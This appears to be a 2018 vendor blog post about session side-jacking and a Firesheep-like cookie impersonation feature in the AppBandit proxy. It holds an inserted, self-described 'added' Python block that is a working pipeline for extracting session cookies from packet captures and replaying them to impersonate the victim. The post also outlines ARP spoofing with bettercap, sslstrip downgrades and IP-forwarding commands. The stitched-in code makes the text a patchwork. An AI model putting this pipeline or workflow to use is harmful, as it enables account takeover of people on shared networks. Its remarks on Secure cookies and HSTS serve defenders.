Session Side Jacking

Implementing Firesheep 2.0 in AppBandit

Thu Mar 15 2018 16:56:50 GMT+0000 (GMT)

Firesheep was an extension for Mozilla Firefox which sniffed unencrypted traffic, for example by eavesdropping on a public WiFi network, and then impersonated captured web sessions by automatically setting up the session cookies in the browser, i.e. it let the attacker access Facebook, for example, as the user whose session was hijacked. The attack worked because at the time many sites served everything after the login form over plain HTTP, so the session cookie travelled in cleartext on every request. The tool was released in 2010 and was well received world-wide; there is even a Wikipedia page about it. Firesheep was a lot of fun as it made the whole process from capture to impersonation straightforward. For various reasons, the Firesheep extension was later discontinued.

The attack used by Firesheep is well understood and, frankly, it was not even new when the tool appeared. There were and still are numerous tools to help you sniff and attack networks of any type. For example, you can sniff traffic with off-the-shelf tools like tcpdump, ARP spoof with tools like bettercap, DNS poison with some basic Python scripts, and much more. However, when it comes to actually logging in as the attacked user, it is still a manual process: copy the captured cookies out of the capture and into a browser or an intercepting proxy. There was no replacement for the almighty Firesheep - well, until now.
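To make the capture-to-impersonation step concrete, here is an added example that is not code from the original post, from AppBandit or from pown.js: a minimal Python version of the Firesheep pipeline. It parses a libpcap file held in memory, pulls plaintext HTTP requests out of IPv4/TCP segments, collects the cookies per host, and builds the request an attacker's client would send to ride the captured session. It also includes the defender's side of the same check, whether a Set-Cookie value carries the Secure attribute. The capture, the host www.example.com, the addresses and the cookie names are all constructed for illustration; a real capture additionally needs TCP reassembly, whereas this treats each segment as one request.

```python
"""Session side-jacking end to end: parse a libpcap capture, pull plaintext HTTP
requests out of IPv4/TCP payloads, collect cookies per host, and build the request
that rides the captured session. All sample traffic is constructed in memory."""
import struct

LINKTYPE_ETHERNET = 1

def parse_pcap(data):
    """Yield link-layer frames from libpcap bytes (either byte order)."""
    end = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(data[:4])
    if end is None:
        raise ValueError("not a libpcap file")
    if struct.unpack(end + "I", data[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures handled here")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(end + "I", data[off + 8:off + 12])[0]
        off += 16
        yield data[off:off + incl_len]
        off += incl_len

def tcp_payload(frame):
    """Return (src, sport, dst, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType must be IPv4
        return None
    ip = frame[14:]
    if ip[9] != 6:                                        # IP protocol 6 is TCP
        return None
    ihl = (ip[0] & 0x0F) * 4
    total = struct.unpack("!H", ip[2:4])[0]
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total]
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack("!HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4
    return src, sport, dst, dport, tcp[doff:]

def extract_cookies(payload):
    """Parse one plaintext HTTP request; return (host, {name: value}) or None."""
    lines = payload.partition(b"\r\n\r\n")[0].decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):  # skips responses
        return None
    host, cookies = None, {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "host":
            host = value
        elif name == "cookie":
            for pair in value.split(";"):
                k, _, v = pair.strip().partition("=")
                if k:
                    cookies[k] = v
    return (host, cookies) if host and cookies else None

def sessions_from_pcap(data):
    """Map host -> cookies, merging every plaintext request in the capture."""
    jar = {}
    for frame in parse_pcap(data):
        info = tcp_payload(frame)
        found = extract_cookies(info[4]) if info and info[4] else None
        if found:
            jar.setdefault(found[0], {}).update(found[1])
    return jar

def impersonation_request(host, cookies, path="/"):
    """The request the attacker's client sends to act as the victim; no password needed."""
    cookie_hdr = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_hdr}\r\n\r\n"

def cookie_is_sidejackable(set_cookie):
    """Defender's check on a Set-Cookie value: without Secure the browser also sends
    the cookie over plain HTTP where it can be sniffed. HttpOnly does not help."""
    attrs = [a.strip().lower() for a in set_cookie.split(";")[1:]]
    return "secure" not in attrs

def build_pcap(payload, src="10.0.0.5", dst="203.0.113.10", sport=50000, dport=80):
    """Wrap payload in Ethernet/IPv4/TCP inside a little-endian pcap (test data only)."""
    def ip4(s): return bytes(int(x) for x in s.split("."))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                     ip4(src), ip4(dst)) + tcp
    frame = b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00" + ip
    ghdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    return ghdr + struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame

# Constructed sample: one victim request sniffed on the open WiFi (hypothetical host).
SAMPLE_REQUEST = (
    b"GET /home.php HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Cookie: sessionid=1a2b3c4d; csrftoken=zz99; theme=dark\r\n"
    b"Connection: keep-alive\r\n\r\n"
)
SAMPLE_PCAP = build_pcap(SAMPLE_REQUEST)
```

Calling sessions_from_pcap(SAMPLE_PCAP) yields one host with its three cookies, and impersonation_request turns that into the replay request; everything an intercepting proxy needs to do is set those cookies on outgoing requests to the same host. cookie_is_sidejackable is the mirror image: it is why HTTPS everywhere plus Secure cookies (and HSTS, which stops the downgrade) ended Firesheep's run against the big sites.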

Starting from version 0.2.0 you can impersonate any session captured by AppBandit, and multiple concurrent sessions are supported. The spirit of Firesheep lives on. AppBandit opens up a whole new world of security research and security testing. Let's look at how this is done with a real-world example - sort of.

AppBandit is an intercepting attack proxy, so any traffic that goes through its built-in proxy server can be impersonated. Unlike other proxies, however, going through the proxy is not a requirement, nor is it the only thing AppBandit does: it can consume data feeds from remote endpoints, including PCAP data captured by libpcap and equivalent libraries. We will use "Pown Now" from pown.js to capture the data. The endpoint is set up locally for convenience, but you can put it anywhere, including on your Pi Zero W.

As illustrated by the screenshot above, "Pown Now" is set up to listen on en0, and we connect to it from AppBandit. Again, the endpoint can run anywhere, and you can just as easily implement your own in Rust or Go.

The feed is now configured in AppBandit, which means we will see whatever passes through the endpoint we are connected to. Next we need a tool to perform an active attack such as ARP spoofing, which redirects the victim's traffic through our machine so that it shows up on en0 in the first place. There are several off-the-shelf tools for that; one of them is bettercap. Let's do it.

We can improve on this configuration a bit. For example, we can turn on sslstrip to downgrade the victim's HTTPS links to HTTP, although that only works against sites without HSTS (and, in current browsers, sites not on the HSTS preload list), and perhaps use the proxy options to pipe directly into AppBandit, but neither is required at the moment. And yes, if you are on a Mac, you must enable IP forwarding with sysctl -w net.inet.ip.forwarding=1 (on Linux the equivalent is sysctl -w net.ipv4.ip_forward=1); otherwise the spoofed traffic is dropped instead of being relayed to the real gateway and the victim simply loses connectivity.

Sure enough, we have a session in AppBandit - don't ask how. Notice the "Impersonate" option in the request menu. Click it and you get Kermit. We still need to work on the UI, but the feature is 100% functional.

And we are done. We have omitted some details about the secret sauce so as not to make this article script-kiddie friendly, but the part about AppBandit is 100% accurate: the feature exists, it works, and I am sure you will find it very useful in numerous situations, such as when performing mobile security assessments.